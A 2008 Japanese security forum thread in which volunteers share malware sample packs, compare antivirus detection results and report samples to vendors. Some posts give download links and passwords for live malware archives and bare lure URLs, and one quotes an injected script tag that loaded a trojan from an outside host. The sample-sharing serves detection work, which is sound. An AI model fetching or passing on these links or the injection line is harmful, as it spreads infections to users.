K7AntiVirus 9.5.0556
4/12
Malware\0,xcodec.207.exe,Infected by Trojan-Downloader.Win32.Zlob.zgg,Cleaned ,
Malware\3,setup.ver1_1000.0_.exe,Infected by Trojan.Win32.Malware.1,Cleaned ,
Malware\7,iftp.com,Infected by Trojan-Downloader.Win32.Banload.uka,Cleaned ,
Malware\a,HotProtector.exe,Infected by Trojan-Downloader.Win32.VB.hue,Cleaned ,

435 :名無しさん@お腹いっぱい。:2008/09/21(日) 15:23:43
>>433では5番検出してるのに俺のAntiVirでは検出しない・・・
VTは7.8使ってるけどパソコンに入ってるのは8だからかな?
ちなみに入っているのはプレミアムです。

436 :名無しさん@お腹いっぱい。:2008/09/21(日) 15:32:50
まぁでもとりあえず 9/12
0 TR/Dldr.Zlob.geb [trojan]
1 DR/Fraud.AntiVirusPro.F [dropper]
2
3 TR/Fakealert.PT [trojan]
4 TR/Dldr.Delf.nxn [trojan]
5
6 TR/Spy.Banker.Gen [trojan]
7 TR/Dldr.Banload.Uka.1 [trojan]
8 TR/Drop.Age.2005796 [trojan]
9 HTML/Crypted.Gen [virus]
a TR/Crypt.NSPM.Gen [trojan]
b

437 :名無しさん@お腹いっぱい。:2008/09/21(日) 15:39:47
http://www3.uploader.jp/dl/ikedango/ikedango_uljp00001.cab

438 :名無しさん@お腹いっぱい。:2008/09/21(日) 16:04:47
>>435
うちのやつだと5はヒューリスティックで検出してきたからレベル上げたら引っかかるんじゃね?
レベルはHighにしてる

439 :名無しさん@お腹いっぱい。:2008/09/21(日) 16:12:41
>>438
highにしたら引っかかりました。

440 :名無しさん@お腹いっぱい。:2008/09/21(日) 16:16:31
>>433
みんなのところはVirustotalにシマンテックの項目でてる?

441 :名無しさん@お腹いっぱい。:2008/09/21(日) 16:50:34
>>431
McAfeeに送らせて頂きました。
>>440
でてます。

442 :名無しさん@お腹いっぱい。:2008/09/21(日) 16:50:45
あるのとないのあるな。分母の数も35or36と違うし

443 :名無しさん@お腹いっぱい。:2008/09/21(日) 16:58:34
あれなんだろうね
リアナライズしたら増えたり減ったりする事もあるし

444 :名無しさん@お腹いっぱい。:2008/09/21(日) 17:38:49
0-3-4-5-6-7-8-a検出 8/11撃墜

2008/09/22 2:34: ファイル C:\Documents and Settings\\Malware\0\xcodec.207.exe に不正なコードを検知しました。 
感染: Trojan-Downloader.Win32.Zlob.zgg 
2008/09/22 2:34: ファイル C:\Documents and Settings\\Malware\3\setup.ver1_1000.0_.exe に不正なコードを検知しました。 
感染: Trojan-Downloader.Win32.FraudLoad.vcek 
2008/09/22 2:34: ファイル C:\Documents and Settings\\Malware\4\UsbDrv.com に不正なコードを検知しました。 
感染: Trojan-Downloader.Win32.Delf.nxn 
2008/09/22 2:34: ファイル C:\Documents and Settings\\Malware\5\_svideo.com に不正なコードを検知しました。 
感染: Trojan-Downloader.Win32.Banload.vxe 
2008/09/22 2:34: ファイル C:\Documents and Settings\\Malware\6\_video.com に不正なコードを検知しました。 
感染: Trojan-Downloader.Win32.Banload.vtq 
2008/09/22 2:34: ファイル C:\Documents and Settings\\Malware\7\iftp.com に不正なコードを検知しました。 
感染: Trojan-Downloader.Win32.Banload.uka 
2008/09/22 2:34: ファイル C:\Documents and Settings\\Malware\8\eAntivirusProInstaller.exe に不正なコードを検知しました。 
感染: Trojan-Downloader.Win32.FraudLoad.vcem 
2008/09/22 2:34: ファイル C:\Documents and Settings\\Malware\a\HotProtector.exe に不正なコードを検知しました。 
感染: Trojan-Downloader.Win32.VB.hue 



445 :名無しさん@お腹いっぱい。:2008/09/21(日) 17:39:17
>>444はF-Secure2009



446 :F-Secure2009:2008/09/21(日) 17:43:08
>>444の追加
1-2番 直接スキャンで追加検出



447 :名無しさん@お腹いっぱい。:2008/09/21(日) 18:06:43
キタ━(゚∀゚)━(∀゚ )━(゚  )━(  )━(  )━(  ゚)━( ゚∀)━(゚∀゚)━ !!

448 :名無しさん@お腹いっぱい。:2008/09/21(日) 22:48:03
>>431
Rising Antivirus 2009 21.01.30 (20.63.05.00) Last Update Time=2008-09-18 14:19
スルー
まだ2009用の定義は不定期配信ぽいのでだめだな・・

449 :名無しさん@お腹いっぱい。:2008/09/22(月) 00:13:14
>>431
カスペ
2,9,bを検出しないので送りました

450 :412=417:2008/09/22(月) 13:50:18
>>398
カスペからの返事.古いが、一応…。

2008/09/18 (木) 11:41 SoftwareSetup.exeについて
Hello.
New malicious software was found in the attached file.
It's detection will be included in the next update. Thank you for your help.

Trojan-Downloader.Win32.FraudLoad.vcej


2008/09/20 (土) 0:33,2:34
Hello,

TotalSecure2009.exe_,antispyware_setup.exe_

No malicious code was found in this file.

Please quote all when answering.


9/12
(うち、0\setup.exeについては、未だ回答待ちorz)

最近反応遅いようなorz

451 :448:2008/09/23(火) 03:18:40
>>431
Rising Internet Security 2009 21.00.10 (20.63.07.00) Last Update Time=2008-09-22 16:00 6\_video.com: Trojan.Spy.Banker.GEN
7\iftp.com: Trojan.Spy.Win32.Banker.mcm
a\HotProtector.exe>>mian007: Packer.Win32.Mian007.a

452 :451:2008/09/23(火) 03:19:55
すまん改行1個無視された

453 :名無しさん@お腹いっぱい。:2008/09/23(火) 13:32:27
http://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=80
pass:Malware
http://www.virustotal.com/jp/analisis/5244ea7c98dd74c45436a4fc3612c00a

454 :名無しさん@お腹いっぱい。:2008/09/23(火) 13:36:58
>>453
McAfeeスルーヽ(`Д´)ノ

455 :F-Secure2009:2008/09/23(火) 16:23:37
>>453
スルー

検体提出

456 :名無しさん@お腹いっぱい。:2008/09/23(火) 17:56:09
ttp://tane.sakuratan.com/
ファイルのサイズが小さく↑へは上げられないので
ttp://www5.uploader.jp/home/tane/←ここで

ttp://www5.uploader.jp/dl/tane/tane_uljp00089.zip.html
解凍パス:infected
DLパス:virus
左クリックではエラー、ダウンロード不可
右クリック、対象をファイルに保存でダウンロード可

ttp://www.virustotal.com/jp/analisis/ed21a0b4f24764c7d53e64a326c2ab1a

McAfee送信済み

457 :名無しさん@お腹いっぱい。:2008/09/23(火) 18:02:48
>>456
間違えたので後で訂正します

458 :F-Secure2009:2008/09/23(火) 19:35:13
>>455
返事来た
> Hello,

> Thank you for your e-mail.

> The file you sent was found to be malicious. An appropriate detection will be added in one of the next database updates.

> Our latest database updates are available here:

http://www.f-secure.com/download-purchase/updates.shtml

> Have a nice day!


459 :F-Secure2009:2008/09/23(火) 19:41:52
>>453
対応完了

>>456
撃墜済み

460 :449:2008/09/23(火) 22:07:27
カスペ
2.htm Trojan-Downloader.JS.Agent.cqv
inform.com Trojan-Spy.Win32.Delf.egb
AntiMalware2009Installer.exe not-a-virus:FraudTool.Win32.Agent.cn
対応しました

461 :名無しさん@お腹いっぱい。:2008/09/23(火) 23:03:39
>>453
ノートンに提出した

462 :名無しさん@お腹いっぱい。:2008/09/24(水) 00:18:44
>>453
ノートンがDownloader.MisleadAppで検出するようになった
即返信が来たところをみると、すでに誰かが送った後だったのかな

463 : ◆W32/Vael.o :2008/09/24(水) 19:00:31
ttp://www.tane.sakuratan.com/upload/upload.cgi?mode=dl&file=81
Malware-Pack43

464 :F-Secure2009:2008/09/24(水) 19:47:29
>>463
0-3-4-6-7-a-b検出 7/11撃墜

2008/09/25 4:41: ファイル\\Malware\0\updater_1_42941010.exe に不正なコードを検知しました。 
感染: Trojan-Ransom.Win32.Hexzone.ic 
処理: ファイルを削除しました。 
2008/09/25 4:41: ファイル\\Malware\3\meane.stf に不正なコードを検知しました。 
感染: Trojan-Downloader.Win32.Agent.agzq 
処理: ファイルを削除しました。 
2008/09/25 4:41: ファイル\\Malware\4\load.exe に不正なコードを検知しました。 
感染: Trojan.Win32.Pakes.kna 
処理: ファイルを削除しました。 
2008/09/25 4:41: ファイル\\Malware\6\setup.exe に不正なコードを検知しました。 
感染: Trojan-Downloader.Win32.Zlob.zko 
処理: ファイルを削除しました。 
2008/09/25 4:41: ファイル\\Malware\7\MultyCodecUpgr.7.exe に不正なコードを検知しました。 
感染: Trojan-Downloader.Win32.Agent.ahfd 
処理: ファイルを削除しました。 
2008/09/25 4:41: ファイル\\Malware\a\free.porn.movie.exe に不正なコードを検知しました。 
感染: Trojan-Dropper.Win32.Agent.wze 
処理: ファイルを削除しました。  
2008/09/25 4:41: ファイル\\Malware\b\xcodec.103.exe に不正なコードを検知しました。 
感染: Trojan-Downloader.Win32.CodecPack.ac 
処理: ファイルを削除しました。 


465 :F-Secure2009:2008/09/24(水) 19:53:32
>>463
未検出検体を提出

466 :名無しさん@お腹いっぱい。:2008/09/24(水) 21:07:33
http://www.lineagecojp.com/movie/mov0023.zip

467 :名無しさん@お腹いっぱい。:2008/09/24(水) 21:07:42
>>463
d
カスペ2009 @ 19:21:00
7/12
>>464と同じだった。
検体提出します。

Detected Trojan program Trojan-Ransom.Win32.Hexzone.ic0/updater_1_42941010.exe
Detected Trojan program Trojan-Downloader.Win32.Agent.agzq3/meane.stf
Detected Trojan program Trojan.Win32.Pakes.kna4/load.exe
Detected Trojan program Trojan-Downloader.Win32.Zlob.zko6/setup.exe//PE_Patch.UPX
Detected Trojan program Trojan-Downloader.Win32.Agent.ahfd7/MultyCodecUpgr.7.exe
Detected Trojan program Trojan-Dropper.Win32.Agent.wzea/free.porn.movie.exe
Detected Trojan program Trojan-Downloader.Win32.CodecPack.acb/xcodec.103.exe

468 :名無しさん@お腹いっぱい。:2008/09/24(水) 21:32:52
>>463
未検出をMcAfeeに送らせて頂ました。
>>466
ttp://www.virustotal.com/jp/analisis/a6f4b35ad864a0bce76598aa7ac61e11

469 :名無しさん@お腹いっぱい。:2008/09/24(水) 21:33:56
>>463
Avira Free 1,3,9スルー
検体提出しておきます

470 :名無しさん@お腹いっぱい。:2008/09/24(水) 21:42:01
>>463
Rising Internet Security 2009 21.00.30 (20.63.20.00) Last Update Time=2008-09-24 14:21
8\xh-codec.v.1.189.exe>>$TEMP\11892.exe: Trojan.Win32.DNSChanger.drb

471 :名無しさん@お腹いっぱい。:2008/09/24(水) 21:53:59
>>463
VT

0 26/36 http://www.virustotal.com/analisis/c174f9f41a8e1a12f6a9a3437198307a
1 12/36 http://www.virustotal.com/analisis/3f574b09ecee08903bc08c32a19c9848
2 _9/36 http://www.virustotal.com/analisis/5ecee31b467db131d4299f021aec8a2b
3 26/36 http://www.virustotal.com/analisis/c09d2ba39f57444d52a9357b6a7be64c
4 22/36 http://www.virustotal.com/analisis/62c206661015bb503c51109912761213
5 _9/36 http://www.virustotal.com/analisis/b3b31d025b48c204b4c5e8575c7568ac
6 19/36 http://www.virustotal.com/analisis/568723e8914762514cad3b0bbd84ab3c
7 14/36 http://www.virustotal.com/analisis/dc4f3763920d3cf05886465e52098f51
8 12/36 http://www.virustotal.com/analisis/73b46b69878b93e50db2c74d31ea77a8
9 14/36 http://www.virustotal.com/analisis/1e742cdcc12965d4ae22e082a2f23fb3
a 26/36 http://www.virustotal.com/analisis/c174f9f41a8e1a12f6a9a3437198307a
b 16/36 http://www.virustotal.com/analisis/c57907cacbcd0c3685d52e17262abd41

472 :471:2008/09/24(水) 21:58:04
0 を
0 11/36 http://www.virustotal.com/analisis/622f8cf1679b1227563e77a521078bdf

に訂正

473 :名無しさん@お腹いっぱい。:2008/09/24(水) 22:07:27
>>463

K7AntiVirus 9.5.0558
2/12
Malware\4,load.exe,Infected by Trojan.Win32.Small.HAFF,Cleaned ,
Malware\a,free.porn.movie.exe,Infected by Trojan-Dropper.Win32.Agent.wze,Cleaned ,

474 :名無しさん@お腹いっぱい。:2008/09/25(木) 00:17:53
>>463
NIS2009で 4/12 (3、6、9、b)
未検出は贈っておきました


475 :名無しさん@お腹いっぱい。:2008/09/25(木) 02:47:46
antivir
10/12
残り提出します。

476 :475:2008/09/25(木) 13:30:00
レス読んでたら、すでにAntiVirの結果書いてあって提出してくれたのね・・・
>>469では1,3,9が未検出って書いてありますけど、解凍時はそうなりますが手動で3番撃墜します。

477 :F-Secure2009:2008/09/25(木) 16:37:18
>>463
2-8-9追加対応
2008/09/26 1:33: ファイル \Malware\2\favicon.exe に不正なコードを検知しました。
感染: Trojan:W32/Agent.GCL
処理: ファイルを削除しました。
2008/09/26 1:33: ファイル\Malware\8\xh-codec.v.1.189.exe に不正なコードを検知しました。
感染: Trojan-Dropper:W32/Agent.FEW
処理: ファイルを削除しました。
2008/09/26 1:33: ファイル \Malware\9\getexe に不正なコードを検知しました。
感染: Trojan-Downloader:W32/Agent.HQN
処理: ファイルを削除しました。

12:25にF-Secureから対応済みとメール受信
F-Secure Security Labs さんは書きました:
>Hello,
>
>Files will be detected:
>favicon.exe Trojan:W32/Agent.GCL
>xh-codec.v.1.189.exe - Trojan-Dropper:W32/Agent.FEW
>getexe - Trojan-Downloader:W32/Agent.HQN
>
>setup_1_1_.exe - file is corrupted
>SmartDownload.exe - casino related application downloader which currently we do not detect.
>
>regards

以上,

478 :名無しさん@お腹いっぱい。:2008/09/27(土) 17:08:14
http://www.youturebe.com/gungho08/guide/makeitem.rar

479 :478:2008/09/27(土) 17:08:59
http://www.youturebe.com/gungho08/guide/makeitem.zip

480 :名無しさん@お腹いっぱい。:2008/09/27(土) 17:13:49
>>479
http://www.virustotal.com/analisis/72b99e57716ffb12da3a84972d449207

481 :名無しさん@お腹いっぱい。:2008/09/27(土) 19:17:16
>>463
カスペからの返事

Hello,

SmartDownload.exe_,
xh-codec.v.1.189.exe_

No malicious code were found in these files.

favicon.exe_ - Trojan.Win32.Agent.aexd,

getexe - Trojan-Dropper.Win32.Agent.xgo,

setup_1_1_.exe_ - Trojan.Win32.FraudPack.adn

New malicious software was found in these files. Detection will be included in the next update. Thank you for your help.

Please quote all when answering.

>>398,414
setup.exeも白

482 :名無しさん@お腹いっぱい。:2008/09/28(日) 23:08:28
http://pc11.2ch.net/test/read.cgi/sec/1140517079/
あやしいファイルを実行するスレより

952 名前:名無しさん@お腹いっぱい。[] 投稿日:2008/09/28(日) 12:53:56
http://1039045726:65535/jp.js

953 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2008/09/28(日) 15:09:41
本体t.gif.gif

954 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2008/09/28(日) 15:56:58
>>952
ttp://www.google.co.jp/search?hl=ja&q=http%3A%2F%2F1039045726%3A65535%2Fjp.js&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=&aq=f&oq=
Lineage II 板「<script src=http://1039045726:65535/jp.js></script>
最近このサイトを見た方は、 ウイルスチェックとパスワードの変更をお勧めします。
>>追記これは少し前に XREA がやられた時と同じタイプなので、 (省略されました・・全てを読むにはここを ...
jbbs.livedoor.jp/game/7135/ - 39k - キャッシュ - 関連ページ - メモをと

ttp://www.virustotal.com/jp/analisis/89ecab35bb571338676d641fa814cca7

483 :名無しさん@お腹いっぱい。:2008/09/28(日) 23:25:45
>>482
シマンテックに送りました

484 :名無しさん@お腹いっぱい。:2008/09/28(日) 23:53:06
>>482
AVGに提出した

485 :228:2008/09/29(月) 00:20:06
カスペからの返事
別件でしつこく催促してたら、1ヶ月前の検体提出結果今頃来た。orz

>>211
\9\index2.html

Hello.
New malicious software was found in the attached file.
It's detection will be included in the next update. Thank you for your help.

Trojan.JS.Agent.cg

Sincerely yours,
Andrey Bezborodov,
Virus Analyst.

486 :名無しさん@お腹いっぱい。:2008/09/29(月) 00:38:11
>>482
カスペにも送付

487 :486:2008/09/29(月) 01:59:26
>>482
カスペからの返事


Hello,

jp.js_

No malicious code was found in this file.

Please quote all when answering.

--
Best regards, Andrey Ladikov
Virus analyst, Kaspersky Lab

488 :名無しさん@お腹いっぱい。:2008/09/29(月) 07:28:19
>>482 が最終的に実行するトロイ
ttp://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=82
virus

489 :名無しさん@お腹いっぱい。:2008/09/29(月) 09:37:21
>>488
AVGにおくりました。

490 :名無しさん@お腹いっぱい。:2008/09/29(月) 16:36:14
>>488
McAfeeおつかいいってきます

491 :490:2008/09/29(月) 16:54:22
WebImmuneの自動解析結果
xrea1.exe / new detection / pws-mmorpg.gen
xrea1t.exe / new detection / generic pws.y

というわけで近日対応の模様

492 :名無しさん@お腹いっぱい。:2008/09/29(月) 17:35:55
>>488

http://www.virustotal.com/analisis/4d92df96015abb5b549e1d422add05da
http://www.virustotal.com/analisis/8a2c51ad0b7dc28ae9990c413cb7d47a

493 :名無しさん@お腹いっぱい。:2008/09/29(月) 20:27:34
>>488
シマンテックにも贈りました

494 :名無しさん@お腹いっぱい。:2008/09/29(月) 20:31:33
検体送るとなんか貰えるの?


495 :名無しさん@お腹いっぱい。:2008/09/29(月) 20:47:14
メール(一部

>>494
>>397

496 :名無しさん@お腹いっぱい。:2008/09/29(月) 21:15:23
>>495
なるほど

497 :名無しさん@お腹いっぱい。:2008/09/29(月) 21:38:24
>>488
McAfeeに送らせて頂ました。
Extra.datが送られてきました。

498 :名無しさん@お腹いっぱい。:2008/09/29(月) 21:39:45
McAfeeも最近対応速くなった?

499 :名無しさん@お腹いっぱい。:2008/09/29(月) 21:50:56
>>498
usには送った事がありませんが
jpには以前送ったことがあります
特に最近速くなったとは感じません

複数の検体を一つのzipで送るよりも
個別に送る様にするといい感じかもです

500 :名無しさん@お腹いっぱい。:2008/09/29(月) 23:40:21
>>487
その先にある SWF ファイルを全部送った。対応完了 by KIS7

501 :名無しさん@お腹いっぱい。:2008/09/30(火) 00:54:26
ttp://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=82
virus

502 : ◆W32/Vael.o :2008/09/30(火) 12:28:12
ttp://www.tane.sakuratan.com/upload/upload.cgi?mode=dl&file=84
Malware-Pack44

McAfeeには提出済み

503 :名無しさん@お腹いっぱい。:2008/09/30(火) 12:38:18
>>502
Rising Internet Security 2009 21.00.70 (20.63.62) Last Update Time=2008-09-28 13:27
1\xxz.exe: Trojan.Win32.Undef.qjt
2\DJ12335.exe: Packer.Win32.Agent.r
9\mensagem102982.exe: Packer.Win32.Agent.r

504 :F-Secure2009:2008/09/30(火) 14:43:35
>>502
3-7-9検出
提出は後時

505 :名無しさん@お腹いっぱい。:2008/09/30(火) 15:55:25
AntiVir 7/12
0
1 RKIT/Agent.aav [trojan]
2 R/Crypt.XPACK.Gen [trojan]
3
4 TR/Crypt.XPACK.Gen [trojan]'
5
6 TR/Clicker.LA [trojan]
7 DR/Delphi.Gen [dropper]
8 TR/Dropper.Gen [trojan]
9 TR/Crypt.XPACK.Gen [trojan]
a
b

残り提出

506 :名無しさん@お腹いっぱい。:2008/09/30(火) 17:43:04
>>502
d
カスペ2009
4/12 (1,3,7,9)

Detected Trojan program Heur.Trojan.Generic 1/xxz.exe
Detected Trojan program Trojan.Win32.Agent.aeyv 3/D4722.exe
Detected Trojan program Trojan.Win32.Agent.aexs 7/load.exe
Detected Trojan program Trojan-Downloader.Win32.Banload.wdp 9/mensagem102982.exe

検体提出します。

507 :名無しさん@お腹いっぱい。:2008/09/30(火) 17:50:45
ttp://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=85
解凍パス:infected
DLパス:virus
ttp://www.virustotal.com/jp/analisis/3b5e1dd4f23152a73f19113e6f2d1e5c
McAfee提出済み

508 :名無しさん@お腹いっぱい。:2008/09/30(火) 18:00:24
>>507
Rising Internet Security 2009 21.01 (20.64.12.00) Last Update Time=2008-09-30 13:52
jpsex.exe>>k1.exe>>upack0.32>>CABINET>>1.exe: Trojan.Win32.Agent.zri

>>502
追加検出なし

509 :名無しさん@お腹いっぱい。:2008/09/30(火) 18:19:16
>>507
パックされていて、k1.exeと共にちゃんとエロ動画(RM形式?)入ってますねww
k1.exeだけの提出も必要かも。

510 :名無しさん@お腹いっぱい。:2008/09/30(火) 20:34:38
>>502
NIS2009で 4/12 (3、7、8、b)
未検出は贈っておきました
>>507

各自確認しておいて下さい
FlashGet 1.8.8.1010 日本語版 (Prevx1 でSuspiciousの検出反応あり)
ttp://flashget.brothersoft.jp/download-FlashGet/1113

511 :名無しさん@お腹いっぱい。:2008/09/30(火) 22:22:22
ブラザーソフトなんか使っちゃダメ!

512 :506:2008/09/30(火) 23:02:44
>>502

カスペからの返事(提出9ファイル内4つ)

Hello,

b > MSCodecLite.7.exe_ - Trojan-Downloader.Win32.CodecPack.at,
6 > w.bin - Trojan-Downloader.Win32.Delf.owb
8 > PCAntispy_Installer_jpn.exe_ - not-a-virus:FraudTool.Win32.PC-AntiSpy.j

New malicious software was found in these files. Detection will be included in the next update. Thank you for your help.

a >setup.exe_

No malicious code was found in this file.

カスペ 7/12(黒:1,3,6,7,8,9,b; 白:a; 回答待ち: 0,2,4,5)

513 :名無しさん@お腹いっぱい。:2008/09/30(火) 23:10:18
ブラザーと牛&蠍は絶対につこうたらいかん

514 :名無しさん@お腹いっぱい。:2008/10/01(水) 10:57:47
http://apple.mydns.to/uploader/65598011.zip

515 :名無しさん@お腹いっぱい。:2008/10/01(水) 22:13:06
>>502
マイシールド(V3ウイルスブロック) 2008.10.01.03
12個中1つ(bのみ)しか検出できなかった…。
ウイルスキラーと同等ぐらい欲しかったけれど、それ以下か。



516 :名無しさん@お腹いっぱい。:2008/10/02(木) 01:41:50
http://unti-p2p-gnx.hp.infoseek.co.jp/GN-X.zip

517 :名無しさん@お腹いっぱい。:2008/10/02(木) 10:21:38
意外とマイナーなベンダーの使ってる人って多いのかね?
このスレに登場する顔ぶれも多様じゃのう

518 :名無しさん@お腹いっぱい。:2008/10/02(木) 18:37:09
>>516
ttp://www.virustotal.com/jp/analisis/f3740f38f76a4e5ad7ecc321a5b8b97c
一応McAfeeに提出させて頂ました。

519 :506:2008/10/02(木) 20:30:55
>>502,512

カスペからの返事。6:20AM。今回は、検体名記載なし。
Hello.
New malicious software was found in the attached file.
It's detection will be included in the next update. Thank you for your help.

>>506を19:25:00で再スキャンした結果。9/12 (1,2,3,4,6,7,8,9,b)。たぶん、これで確定。

Detected Trojan program Trojan.Win32.Agent.afkx 1\xxz.exe ← NEW シグネチャに変更
Detected Trojan program Trojan-Downloader.Win32.Dadobra.bjy 2\DJ12335.exe ← NEW
Detected Trojan program Trojan.Win32.Agent.aeyv 3\D4722.exe
Detected Trojan program Trojan-Proxy.Win32.Agent.bbb 4\aanew.exe ← NEW
Detected Trojan program Trojan-Downloader.Win32.Delf.owb 6\w.bin ← >>512で追加検知
Detected Trojan program Trojan.Win32.Agent.aexs 7\load.exe
Detected riskware not-a-virus:FraudTool.Win32.PC-AntiSpy.j 8\PCAntispy_Installer_jpn.exe ← >>512で追加検知
Detected Trojan program Trojan-Downloader.Win32.Banload.wdp 9\mensagem102982.exe
Detected Trojan program Trojan-Downloader.Win32.Small.aecf b\MSCodecLite.7.exe ← >>512で追加検知

520 :名無しさん@お腹いっぱい。:2008/10/03(金) 01:23:47
【緊急!】ウイルス即行駆除方法【助けて!】Part3
http://pc11.2ch.net/test/read.cgi/sec/1214830385/424

ttp://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=86
dlkey security

http://pc11.2ch.net/test/read.cgi/sec/1214830385/413
http://pc11.2ch.net/test/read.cgi/sec/1214830385/419
http://pc11.2ch.net/test/read.cgi/sec/1214830385/422

より


521 :名無しさん@お腹いっぱい。:2008/10/03(金) 09:10:57

Kaspersky Virus.Win32.Sality.aa
Dr.WEB Win32.Sector.9

522 :名無しさん@お腹いっぱい。:2008/10/03(金) 09:32:55
ネタ元 ttp://www.lac.co.jp/news/press20081002.html
ttp://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=87
virus

523 :名無しさん@お腹いっぱい。:2008/10/03(金) 11:27:42
>>522 AVG提出済み

掲示板管理人殿
英語仕様なのでURLを提出してベンダーがアクセスできます。
ありがとう。

524 :名無しさん@お腹いっぱい。:2008/10/03(金) 11:27:57
>>522
d
カスペ2009
5/10

Detected Trojan program Trojan-Downloader.Win32.BHO.uy     iema.exe
Detected Trojan program Trojan.Win32.Inject.fcb            tt1.exe
Detected Trojan program Trojan-Downloader.Win32.BHO.uz     tt2.exe
Detected Trojan program Trojan-GameThief.Win32.OnLineGames.tlps x2.exe
Detected Trojan program Trojan-GameThief.Win32.WOW.ccx     x2_1.exe

検体提出します。

525 :名無しさん@お腹いっぱい。:2008/10/03(金) 11:52:24
Rising Internet Security 2009 21.01.20 (20.64.32.00) Last Update Time=2008-10-02 13:59
>>520
tefrfa.cmd, spico.pif: Win32.KUKU.a
>>522
iema.exe>>upack0.39: Trojan.PSW.Iepass.e
tt2.exe>>upack0.34: Trojan.Win32.Agent.zri

526 :名無しさん@お腹いっぱい。:2008/10/03(金) 13:58:44
McAfee

>>520
tefrfa.cmd, spico.pif : W32/Sality.ag

>>522
iema.exe : BackDoor-AWQ.b
tt1.exe : PWS-Lineage
tt2.exe : Generic PWS.y
x2.exe : PWS-Mmorpg.gen

527 :名無しさん@お腹いっぱい。:2008/10/03(金) 18:10:05
>>520 >>522
シマンテックにも贈りました

528 :名無しさん@お腹いっぱい。:2008/10/03(金) 18:24:41
え? オールスルー?

529 :名無しさん@お腹いっぱい。:2008/10/03(金) 18:43:36
(・∀・)

530 :名無しさん@お腹いっぱい。:2008/10/03(金) 18:49:55
>>522
未対応分をMcAfeeに提出させて頂きました。

531 :名無しさん@お腹いっぱい。:2008/10/04(土) 12:00:18
ttp://subwiz.trendmicro.com/
でバスターに検体送ろうとしたら
Persits.Upload.1 error '800a0006'
There is not enough space on the disk.
ディスクがいっぱいですwww

532 :524:2008/10/04(土) 14:25:37
>>522
カスペから返事来ないが、3体追加検出。 8/10

Detected Trojan.Win32.Agent.afrt      x1.exe
Detected Trojan-PSW.Win32.Agent.kxy   x1_2.exe
Detected Trojan.Win32.Agent.afrs x.exe

残り2つがCleanかは不明。

533 :475:2008/10/04(土) 15:47:32
>>522
AntiVir 全部撃退

534 :名無しさん@お腹いっぱい。:2008/10/04(土) 17:42:02
>>532
返事あった。
x_1.exe - Trojan.Win32.Agent.aftz
x1_1.exe - Trojan.Win32.Agent.aftx

535 : ◆W32/Vael.o :2008/10/04(土) 18:29:36
ttp://www.tane.sakuratan.com/upload/upload.cgi?mode=dl&file=88
Malware-Pack45

McAfeeには提出済み

536 :名無しさん@お腹いっぱい。:2008/10/04(土) 18:51:34
>>535
Rising Internet Security 2009 21.01.40 (20.64.52.00) Last Update Time=2008-10-04 14:03
2\DJ12335.exe: Packer.Win32.Agent.r
5\aklremover.exe: Trojan.DL.QQHelper.GEN

537 :名無しさん@お腹いっぱい。:2008/10/04(土) 20:15:12
>>535
NIS2009で 3/12 (7、8、9)
未検出は贈っておきました

538 :名無しさん@お腹いっぱい。:2008/10/04(土) 21:35:01
>>535
d
カスペ2009

4/12 (0,4.7,8) 19:28:00 検体提出します。

Detected Trojan program Trojan-Dropper.Win32.Agent.xms        tane0088.zip/Malware/0/c-setup.exe
Detected Trojan program Trojan.Win32.KillFiles.acn             tane0088.zip/Malware/4/charmap2.sys
Detected riskware not-a-virus:Downloader.Win32.FraudLoad.fx     tane0088.zip/Malware/7/av_2009.exe
Detected riskware not-a-virus:FraudTool.Win32.SpywareGuard2008.a  tane0088.zip/Malware/8/SpywareGuard2008.exe


>>534確認。結局、>>522は10/10だったね。

539 :名無しさん@お腹いっぱい。:2008/10/04(土) 22:53:48
>>535
antivir 7/12(0,1,2,4,7,8,b)
残り提出します

540 :名無しさん@お腹いっぱい。:2008/10/05(日) 17:08:44
Antvirの結果を見ると検出数はさすがだね

541 :名無しさん@お腹いっぱい。:2008/10/05(日) 17:51:53
Antvir厨の自作自演検体だからね
と、一時期Kaspersky叩きをしていた連中にキャンコラキャンコラほえられる

542 :名無しさん@お腹いっぱい。:2008/10/05(日) 19:03:41
>>541
それはない。前からのコテハン。


もうウイルスが増えすぎてブラックリスト方式が難しくなってきたような
毎年10倍ずつ対数式に増えてるんだろ。スピアのウイルスもある。
いずれはホワイトリスト方式にするしかないような。
性善説から性悪説への転換。
ホワイトリスティングするには課題もあるだろうが。
シマンテックとかカスペルスキーもユーザー間でネットワーク組んで、DB集めて
スキャン省略したり、挙動を許可してる。
将来のCPUの多コア化を見越して、専用のコアに仮想化環境を割り当てて
砂箱判定してから、本環境で実行する構想もある。

543 :名無しさん@お腹いっぱい。:2008/10/05(日) 20:29:38
http://rapidshare.com/files/150403205/WinRar_Keygen.zip

544 :名無しさん@お腹いっぱい。:2008/10/05(日) 20:59:30
ここは鑑定スレじゃねえよ糞が、死ね

545 :名無しさん@お腹いっぱい。:2008/10/05(日) 21:05:27
これですね

WinRAR Part17
http://pc11.2ch.net/test/read.cgi/software/1222837887/69,106

69 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2008/10/04(土) 22:00:36 ID:4Lt7ywzx0
http://rapidshare.com/files/150403205/WinRar_Keygen.zip

106 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2008/10/05(日) 15:02:18 ID:p4QTRTnV0
http://www.virustotal.com/jp/analisis/977353ab0292cea800a3bee8a8e0b8b4

546 :名無しさん@お腹いっぱい。:2008/10/05(日) 21:07:14
>>543
http://www.virustotal.com/jp/analisis/6371bc7bd2af99c49182387d3dc6a8a2

McAfeeに提出予定

547 :名無しさん@お腹いっぱい。:2008/10/05(日) 21:16:12
>>543
McAfee提出させて頂ました。

548 :名無しさん@お腹いっぱい。:2008/10/05(日) 21:19:05
http://www.cyokinde.com/ffxishowvide/16498897649.rar

549 :名無しさん@お腹いっぱい。:2008/10/05(日) 21:25:05
>>548
>>338

550 :名無しさん@お腹いっぱい。:2008/10/05(日) 21:28:08
>>548
http://www.virustotal.com/analisis/0978e7d100e4e3937c9aed652bdead33
AVG・・・

551 :名無しさん@お腹いっぱい。:2008/10/05(日) 21:31:41
>>548
ウイルスチェイサーで撃退

552 :名無しさん@お腹いっぱい。:2008/10/05(日) 22:01:08
>>548
